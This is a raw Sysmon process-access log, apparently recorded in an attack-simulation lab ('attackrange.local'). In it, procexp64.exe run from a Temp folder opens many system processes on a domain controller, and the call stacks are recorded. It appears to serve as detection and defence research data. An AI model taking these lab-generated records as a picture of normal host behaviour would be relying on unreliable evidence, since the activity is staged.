15:16:13.033{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787799Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.033{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787798Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.033{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787797Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.033{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787796Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.033{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787795Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.033{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787794Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.033{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787793Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.033{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787792Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.033{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787791Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.033{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787790Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.033{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787789Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.033{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787788Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.033{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787787Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.033{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787786Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.033{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787785Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.033{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787784Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.033{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787783Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.033{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787782Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.033{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787781Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.033{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787780Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.033{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787779Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.033{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787778Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.033{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787777Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.033{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787776Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 